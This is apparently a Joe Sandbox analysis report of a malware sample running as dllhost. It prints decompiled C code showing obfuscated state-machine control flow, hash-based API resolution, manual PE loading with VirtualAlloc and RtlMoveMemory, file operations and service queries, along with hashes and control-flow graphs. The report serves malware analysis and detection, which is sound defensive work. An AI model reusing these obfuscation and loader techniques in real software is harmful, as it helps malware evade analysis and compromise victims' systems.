				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E0048B6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x48dec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E00483F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E00483E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x48dec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x48de3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E00483F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E00483E60(_t101, _t98, 0x20de7595, _t126);
									 *0x48de3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x48e1d4;
										if(_t93 == 0) {
											_t97 = E00483F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E00483E60(_t101, _t97, 0xa229df38, _t126);
											 *0x48e1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x48e3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E00483F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E00483E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x48e3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x48de04;
							if( *0x48de04 == 0) {
								_t95 = E00483F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x48de04 = E00483E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x00488400
                                                                                0x00488400
                                                                                0x00488406
                                                                                0x0048840e
                                                                                0x00488416
                                                                                0x0048841e
                                                                                0x00488426
                                                                                0x0048842b
                                                                                0x00488430
                                                                                0x00488438
                                                                                0x00488440
                                                                                0x00488445
                                                                                0x0048844a
                                                                                0x00488452
                                                                                0x0048845a
                                                                                0x00488462
                                                                                0x0048846a
                                                                                0x00488472
                                                                                0x0048847a
                                                                                0x00488482
                                                                                0x00488491
                                                                                0x00488496
                                                                                0x0048849a
                                                                                0x004884a2
                                                                                0x004884af
                                                                                0x004884b3
                                                                                0x004884bb
                                                                                0x004884c3
                                                                                0x004884cb
                                                                                0x004884cf
                                                                                0x004884d7
                                                                                0x004884df
                                                                                0x004884df
                                                                                0x004884e3
                                                                                0x004884e3
                                                                                0x004884e3
                                                                                0x004884e3
                                                                                0x004884e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004884ef
                                                                                0x0048866e
                                                                                0x00488676
                                                                                0x00488696
                                                                                0x0048869a
                                                                                0x004886a2
                                                                                0x004886a6
                                                                                0x004886aa
                                                                                0x004886b2
                                                                                0x004886b4
                                                                                0x00000000
                                                                                0x004886ba
                                                                                0x004886ba
                                                                                0x004886c5
                                                                                0x004886d1
                                                                                0x004886bc
                                                                                0x004886bc
                                                                                0x004886be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004886be
                                                                                0x004886ba
                                                                                0x004884f5
                                                                                0x004884fb
                                                                                0x0048854a
                                                                                0x0048854f
                                                                                0x00488551
                                                                                0x00488558
                                                                                0x0048855d
                                                                                0x00488564
                                                                                0x00488569
                                                                                0x00488569
                                                                                0x00488578
                                                                                0x0048857c
                                                                                0x0048857e
                                                                                0x00488589
                                                                                0x0048858f
                                                                                0x00488591
                                                                                0x00488598
                                                                                0x0048859d
                                                                                0x004885a4
                                                                                0x004885a9
                                                                                0x004885a9
                                                                                0x004885af
                                                                                0x00000000
                                                                                0x004884fd
                                                                                0x00488503
                                                                                0x00488543
                                                                                0x00000000
                                                                                0x00488505
                                                                                0x0048850b
                                                                                0x00000000
                                                                                0x00488511
                                                                                0x00488511
                                                                                0x00488518
                                                                                0x0048851f
                                                                                0x00488524
                                                                                0x0048852b
                                                                                0x00488530
                                                                                0x00488530
                                                                                0x0048853a
                                                                                0x0048853c
                                                                                0x00000000
                                                                                0x0048853c
                                                                                0x0048850b
                                                                                0x00488503
                                                                                0x004884fb
                                                                                0x00000000
                                                                                0x004884ef
                                                                                0x004885c8
                                                                                0x004885ce
                                                                                0x00488630
                                                                                0x00488635
                                                                                0x00488637
                                                                                0x0048863e
                                                                                0x00488643
                                                                                0x0048864a
                                                                                0x0048864f
                                                                                0x0048864f
                                                                                0x00488660
                                                                                0x00488662
                                                                                0x00000000
                                                                                0x004885d0
                                                                                0x004885d0
                                                                                0x004885d6
                                                                                0x00000000
                                                                                0x004885d8
                                                                                0x004885de
                                                                                0x004885e0
                                                                                0x004885e7
                                                                                0x004885ec
                                                                                0x004885fa
                                                                                0x004885fa
                                                                                0x0048861d
                                                                                0x0048861f
                                                                                0x00488621
                                                                                0x00488624
                                                                                0x00000000
                                                                                0x00488626
                                                                                0x00488626
                                                                                0x00000000
                                                                                0x00488626
                                                                                0x00488624
                                                                                0x004885d6
                                                                                0x00000000
                                                                                0x004885b1
                                                                                0x004885b1
                                                                                0x004885b1
                                                                                0x004885bd
                                                                                0x004885bd
                                                                                0x004885c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0048861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: a5a759ea35137b7943c6cfcd25b86c10405ba6961c7497123c9102769c496a88
                                                                                • Instruction ID: 9da8ac49030be37bca3f176df4ff0e195158475f46f9e8fa5770e71ce50b1dc4
                                                                                • Opcode Fuzzy Hash: a5a759ea35137b7943c6cfcd25b86c10405ba6961c7497123c9102769c496a88
                                                                                • Instruction Fuzzy Hash: F661F571A083129FC714EF69C94562FB7E5ABE0718F408C1EF59997290EB78CD058F8A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00470D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 470d60-470dd5 call 470ed0 VirtualAlloc RtlMoveMemory 164 470ebe-470ec4 160->164 165 470ddb-470dde 160->165 165->164 166 470de4-470de6 165->166 166->164 168 470dec-470df0 166->168 168->164 169 470df6-470dfd 168->169 170 470e03-470e36 call 471140 RtlMoveMemory 169->170 171 470eaf-470ebb 169->171 170->164 175 470e3c-470e4a VirtualAlloc 170->175 176 470e4c-470e52 175->176 177 470e89-470ea0 RtlFillMemory 175->177 178 470e54-470e56 176->178 179 470e5a-470e68 176->179 177->164 182 470ea2-470ea5 177->182 178->179 179->164 180 470e6a-470e7d RtlMoveMemory 179->180 180->164 183 470e7f-470e83 180->183 182->164 184 470ea7-470ea9 182->184 183->164 185 470e85 183->185 184->170 184->171 185->177
                                                                                APIs
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00470F08
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00470F3E
                                                                                  • Part of subcall function 00470FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00470F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00470DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00470DC3
                                                                                  • Part of subcall function 00471140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00470EFD,00000000), ref: 00471155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00470E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00470E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00470E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00470E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309813898.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_470000_dllhost.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 7be61c4c45048ff55458e0f9db601dfcb4047018f477b4bd785ba094a0e15586
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1031D271A05340ABD724DB25CC44EEB73E9EBC8384F048D2EB54C93351D639E880876A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00483780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 186 483780-483793 187 4837b0-4837c5 186->187 188 483795-4837ab call 483f00 call 483e60 186->188 192 4837e2-4837fa 187->192 193 4837c7-4837dd call 483f00 call 483e60 187->193 188->187 200 4837fc-483812 call 483f00 call 483e60 192->200 201 483817-483832 192->201 193->192 200->201 206 48384f-48385e 201->206 207 483834-48384a call 483f00 call 483e60 201->207 214 48387b-4838b4 206->214 215 483860-483876 call 483f00 call 483e60 206->215 207->206 220 4838d1-4838e2 SHFileOperationW 214->220 221 4838b6-4838cc call 483f00 call 483e60 214->221 215->214 221->220
                                                                                C-Code - Quality: 62%
                                                                                			E00483780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x48ddc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E00483E60(_t36, E00483F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x48ddc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x48ddc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E00483E60(_t36, E00483F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x48ddc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x48ddc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E00483E60(_t36, E00483F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x48ddc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x48e298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E00483E60(_t36, E00483F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x48e298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x48e298;
				if(_t20 == 0) {
					_t20 = E00483E60(_t36, E00483F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x48e298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x48e30c == 0) {
					 *0x48e30c = E00483E60(_t36, E00483F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x00483785
                                                                                0x00483780
                                                                                0x0048378c
                                                                                0x0048378f
                                                                                0x00483793
                                                                                0x004837a6
                                                                                0x004837ab
                                                                                0x004837ab
                                                                                0x004837b9
                                                                                0x004837bb
                                                                                0x004837c0
                                                                                0x004837c5
                                                                                0x004837d8
                                                                                0x004837dd
                                                                                0x004837dd
                                                                                0x004837ee
                                                                                0x004837f0
                                                                                0x004837f5
                                                                                0x004837fa
                                                                                0x0048380d
                                                                                0x00483812
                                                                                0x00483812
                                                                                0x00483826
                                                                                0x00483828
                                                                                0x0048382d
                                                                                0x00483832
                                                                                0x00483845
                                                                                0x0048384a
                                                                                0x0048384a
                                                                                0x00483855
                                                                                0x00483857
                                                                                0x0048385e
                                                                                0x00483871
                                                                                0x00483876
                                                                                0x00483876
                                                                                0x00483884
                                                                                0x0048388a
                                                                                0x00483892
                                                                                0x0048389d
                                                                                0x004838a6
                                                                                0x004838b4
                                                                                0x004838cc
                                                                                0x004838cc
                                                                                0x004838d5
                                                                                0x004838d9
                                                                                0x004838e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: d866b64678c0cea147ec0abdd82b06bb88c136cf136a590daee06db1c165fbad
                                                                                • Instruction ID: 1c6741e82f0aab3cf55eb9f2795d8936cc46d83727a2e22f47592f78821cb6fc
                                                                                • Opcode Fuzzy Hash: d866b64678c0cea147ec0abdd82b06bb88c136cf136a590daee06db1c165fbad
                                                                                • Instruction Fuzzy Hash: 8E318D70A002015BD714BF7ADC11B6F37EAAB84B08F004D2EBA15DB391EB38DA058799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00488E80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 488e80-488e98 295 488ea0-488ea5 294->295 296 488f7a-488f7f 295->296 297 488eab 295->297 298 489011-489016 296->298 299 488f85-488f8a 296->299 300 488f3f-488f46 297->300 301 488eb1-488eb6 297->301 298->295 302 488f8c-488f91 299->302 303 488fce-488fd5 299->303 306 488f48-488f5e call 483f00 call 483e60 300->306 307 488f63-488f75 300->307 304 48901b-489022 301->304 305 488ebc-488ec1 301->305 310 488fbb-488fc0 302->310 311 488f93-488fa3 302->311 314 488ff2-48900c OpenServiceW 303->314 315 488fd7-488fed call 483f00 call 483e60 303->315 308 48903f 304->308 309 489024-48903a call 483f00 call 483e60 304->309 312 488efc-488f03 305->312 313 488ec3-488ec8 305->313 306->307 307->295 331 489042-489049 308->331 309->308 310->295 322 488fc6-488fcd 310->322 319 488fae-488fb6 311->319 320 488fa5-488fac 311->320 325 488f20-488f2f 312->325 326 488f05-488f1b call 483f00 call 483e60 312->326 313->310 321 488ece-488ed5 313->321 314->295 315->314 319->295 320->319 320->320 329 488ef2-488efa 321->329 330 488ed7-488eed call 483f00 call 483e60 321->330 325->331 342 488f35-488f3a 325->342 326->325 329->295 330->329 342->295
                                                                                C-Code - Quality: 66%
                                                                                			E00488E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x48e270 == 0) {
									 *0x48e270 = E00483E60(_t25, E00483F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x48e54c; // 0x50dff0
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x48e4c8;
						if(_t11 == 0) {
							_t11 = E00483E60(_t25, E00483F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x48e4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x48e18c;
							if(_t15 == 0) {
								_t15 = E00483E60(_t25, E00483F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x48e18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x48e310;
								if(_t19 == 0) {
									_t19 = E00483E60(_t25, E00483F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x48e310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x48e18c;
									if(_t22 == 0) {
										_t22 = E00483E60(_t25, E00483F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x48e18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x00488e82
                                                                                0x00488e86
                                                                                0x00488e8c
                                                                                0x00488e91
                                                                                0x00488e96
                                                                                0x00488e98
                                                                                0x00488ea0
                                                                                0x00488ea0
                                                                                0x00488ea0
                                                                                0x00488ea0
                                                                                0x00488ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00488f7f
                                                                                0x00489011
                                                                                0x00000000
                                                                                0x00488f85
                                                                                0x00488f8a
                                                                                0x00488fd5
                                                                                0x00488fed
                                                                                0x00488fed
                                                                                0x00488ff9
                                                                                0x00488ffb
                                                                                0x00489009
                                                                                0x00000000
                                                                                0x00488f8c
                                                                                0x00488f91
                                                                                0x00000000
                                                                                0x00488f93
                                                                                0x00488f93
                                                                                0x00488f99
                                                                                0x00488fa3
                                                                                0x00488fa5
                                                                                0x00488fa8
                                                                                0x00488fae
                                                                                0x00488fb1
                                                                                0x00000000
                                                                                0x00488fb1
                                                                                0x00488f91
                                                                                0x00488f8a
                                                                                0x00000000
                                                                                0x00488f7f
                                                                                0x00488eab
                                                                                0x00488f3f
                                                                                0x00488f46
                                                                                0x00488f59
                                                                                0x00488f5e
                                                                                0x00488f5e
                                                                                0x00488f64
                                                                                0x00488f6d
                                                                                0x00488f70
                                                                                0x00000000
                                                                                0x00488eb1
                                                                                0x00488eb6
                                                                                0x0048901b
                                                                                0x00489022
                                                                                0x00489035
                                                                                0x0048903a
                                                                                0x0048903a
                                                                                0x00489040
                                                                                0x00000000
                                                                                0x00488ebc
                                                                                0x00488ec1
                                                                                0x00488efc
                                                                                0x00488f03
                                                                                0x00488f16
                                                                                0x00488f1b
                                                                                0x00488f1b
                                                                                0x00488f2b
                                                                                0x00488f2f
                                                                                0x00489042
                                                                                0x00489049
                                                                                0x00488f35
                                                                                0x00488f35
                                                                                0x00000000
                                                                                0x00488f35
                                                                                0x00488ec3
                                                                                0x00488ec8
                                                                                0x00000000
                                                                                0x00488ece
                                                                                0x00488ece
                                                                                0x00488ed5
                                                                                0x00488ee8
                                                                                0x00488eed
                                                                                0x00488eed
                                                                                0x00488ef3
                                                                                0x00488ef5
                                                                                0x00000000
                                                                                0x00488ef5
                                                                                0x00488ec8
                                                                                0x00488ec1
                                                                                0x00488eb6
                                                                                0x00000000
                                                                                0x00488fbb
                                                                                0x00488fbb
                                                                                0x00488fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0050DFF0,00488782,?,3251FEFE,?), ref: 00488FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2309825739.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2309819379.0000000000480000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309836523.000000000048D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000E.00000002.2309844660.000000000048F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_480000_dllhost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: uw(#$uw(#
                                                                                • API String ID: 3098006287-1105621689
                                                                                • Opcode ID: 33e7697bab6dbe63a9248b035255211fa1e8bf37d3bda72f8f6385c35bbae25d
                                                                                • Instruction ID: 33fb4391426dc23598d17aa2aa3c4799a62c94d8dad1abe4dd49320a3284aa88
                                                                                • Opcode Fuzzy Hash: 33e7697bab6dbe63a9248b035255211fa1e8bf37d3bda72f8f6385c35bbae25d
                                                                                • Instruction Fuzzy Hash: F6419131B042149BDB207BBE9C9063F2296AB94B55B940C2FFB45C7741EF68CC81579D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00487120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 349 487120 350 487125-48712a 349->350 351 487130 350->351 352 4871b4-4871b9 350->352 353 487233-487248 call 4834c0 351->353 354 487136-48713b 351->354 355 4871bb 352->355 356 487207-48720c 352->356 377 48724a-487260 call 483f00 call 483e60 353->377 378 487265-487278 LoadLibraryW 353->378 359 48713d 354->359 360 487190-487195 354->360 362 4871bd-4871c2 355->362 363 4871ee-487202 call 487080 355->363 357 48720e-487222 call 487080 356->357 358 487227-48722c 356->358 357->350 358->350 366 487232 358->366 367 48717a-48718e call 487080 359->367 368 48713f-487144 359->368 360->358 365 48719b-4871af call 487080 360->365 370 4871c4-4871c9 362->370 371 4871d5-4871e9 call 487080 362->371 363->350 365->350 367->350 375 487164-487178 call 487080 368->375 376 487146-48714b 368->376 370->358 379 4871cb-4871d0 370->379 371->350 375->350 376->358 385 487151-487162 call 487080 376->385 377->378 389 48727a-487290 call 483f00 call 483e60 378->389 390 487295-4872a0 378->390 379->350 385->350 389->390 400 4872bd-4872c5 390->400 401 4872a2-4872b8 call 483f00 call 483e60 390->401 401->400
                                                                                C-Code - Quality: 85%
                                                                                			E00487120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E004834C0(0x48d830);
							__eflags =  *0x48dd1c;
							if( *0x48dd1c == 0) {
								 *0x48dd1c = E00483E60(_t21, E00483F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x48e548; // 0x547e08
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x48e494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E00483E60(_t21, E00483F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x48e494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x48df30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E00483E60(_t21, E00483F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x48df30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E00487080(_t21, 0x48d7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E00487080(_t21, 0x48d8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E00487080(_t21, 0x48d800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E00487080(_t21, 0x48d860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E00487080(_t21, 0x48d890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E00487080(_t21, 0x48d7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E00487080(_t21, 0x48d8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
